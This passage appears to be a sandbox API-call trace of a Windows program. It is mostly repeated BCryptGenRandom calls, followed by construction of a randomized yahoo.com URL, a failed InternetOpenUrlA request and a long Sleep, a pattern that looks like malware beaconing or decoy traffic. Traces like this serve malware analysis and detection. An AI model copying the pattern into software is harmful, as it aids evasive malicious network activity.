cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.528] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.528] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.529] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.529] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.530] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.531] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.531] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.532] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.533] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.533] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.534] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028ad, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a028ad) returned 0x0 [0181.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.535] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.536] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.536] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.537] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.538] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a028c1, cbBuffer=0x21, dwFlags=0x2 | out: pbBuffer=0x3a028c1) returned 0x0 [0181.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.539] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.540] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0181.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.547] GetProcessHeap () returned 0x440000 [0181.547] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0181.547] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x05Ë gs://www.yahoo.com" | out: lpString1="\x05Ë gs://www.yahoo.com") returned="\x05Ë gs://www.yahoo.com" [0181.547] lstrcatA (in: lpString1="\x05Ë gs://www.yahoo.com", lpString2="/EdEv6nmhsh3V3okhxfcXj1h/asvygdrb0xliwc3vf2wrnp8Exqs8/30nEoJvz0zjg05qic3mgpcsvPhx4lwssucnuer/atzwtn8c5s2p22zYEmh/ftqk4oudv3gbetnsgT8xxc10bb2joIzn/" | out: lpString1="\x05Ë gs://www.yahoo.com/EdEv6nmhsh3V3okhxfcXj1h/asvygdrb0xliwc3vf2wrnp8Exqs8/30nEoJvz0zjg05qic3mgpcsvPhx4lwssucnuer/atzwtn8c5s2p22zYEmh/ftqk4oudv3gbetnsgT8xxc10bb2joIzn/") returned="\x05Ë gs://www.yahoo.com/EdEv6nmhsh3V3okhxfcXj1h/asvygdrb0xliwc3vf2wrnp8Exqs8/30nEoJvz0zjg05qic3mgpcsvPhx4lwssucnuer/atzwtn8c5s2p22zYEmh/ftqk4oudv3gbetnsgT8xxc10bb2joIzn/" [0181.547] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0181.547] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x05Ë gs://www.yahoo.com/EdEv6nmhsh3V3okhxfcXj1h/asvygdrb0xliwc3vf2wrnp8Exqs8/30nEoJvz0zjg05qic3mgpcsvPhx4lwssucnuer/atzwtn8c5s2p22zYEmh/ftqk4oudv3gbetnsgT8xxc10bb2joIzn/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0181.548] GetProcessHeap () returned 0x440000 [0181.548] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0181.548] GetProcessHeap () returned 0x440000 [0181.548] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02850 | out: hHeap=0x440000) returned 1 [0181.548] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0181.548] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0181.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0181.549] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0181.549] Sleep (dwMilliseconds=0x1acc7) [0181.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0181.788] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.985] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.985] GetProcessHeap () returned 0x440000 [0181.985] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54b0 [0181.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54b1, cbBuffer=0x19, dwFlags=0x2 | out: pbBuffer=0x4f54b1) returned 0x0 [0181.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.986] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.986] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0181.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.987] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.987] GetProcAddress (hModule=0x7ffc5bcc0000, 